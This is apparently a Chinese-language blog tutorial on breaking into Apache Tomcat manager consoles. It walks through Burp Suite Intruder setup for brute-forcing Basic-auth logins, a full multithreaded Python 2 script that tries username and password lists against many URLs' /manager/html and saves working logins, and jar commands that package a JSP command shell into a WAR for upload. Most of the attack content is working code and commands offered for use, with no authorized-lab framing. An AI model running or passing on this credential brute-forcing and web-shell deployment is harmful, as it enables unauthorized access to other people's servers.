1.tomcat 用burpsuit进行弱口令爆破
先抓包
发送到inturder
payload type 选择custom iterater
第一个payload选用户名文件,第二个payload用 : 第三个选密码文件
设置base64加密,和去掉URL编码
开始攻击,得到用户名密码
2.用python脚本进行爆破
目前正在学习python,
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by.really
import sys
import requests
import threading
import Queue
import time
import base64
import os
#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open('url.txt','r')
def urllist():
for url in urls:
url=url.rstrip()
u.put(url)
def namelist():
names=open('name.txt','r')
for name in names:
name=name.rstrip()
n.put(name)
def passlist():
passwds=open('pass.txt','r')
for passwd in passwds:
passwd=passwd.rstrip()
p.put(passwd)
def weakpass(url):
namelist()
while not n.empty():
name =n.get()
#print name
passlist()
while not p.empty():
good()
#name = n.get()
passwd = p.get()
#print passwd
headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}
try:
r =requests.get(url,headers=headers,timeout=3)
#print r.status_code
if r.status_code==200:
print '[turn] ' +url+' '+name+':'+passwd
f = open('good.txt','a+')
f.write(url+' '+name+':'+passwd+'\n')
f.close()
else:
print '[false] ' + url+' '+name+':'+passwd
except:
print '[false] ' + url+' '+name+':'+passwd
def list():
while u.empty():
url = u.get()
weakpass(name,url)
def thread():
urllist()
tsk=[]
for i in open('url.txt').read().split('\n'):
i = i + '/manager/html'
t = threading.Thread(target=weakpass,args=(i,))
tsk.append(t)
for t in tsk:
t.start()
t.join(1)
#print "current has %d threads" % (threading.activeCount() - 1)
def good():
good_ = 0
for i in open('good.txt').read().split('\n'):
good_+=1
os.system('title "weakpass------good:%s"' % (good_))
if __name__=="__main__":
# alllist()
thread()
3.getshell
登录成功上传做好的war包,获得shell
成功
4.war包制作
jar -cf test.war cmd.jsp
jar -cf shell.war cmd1/*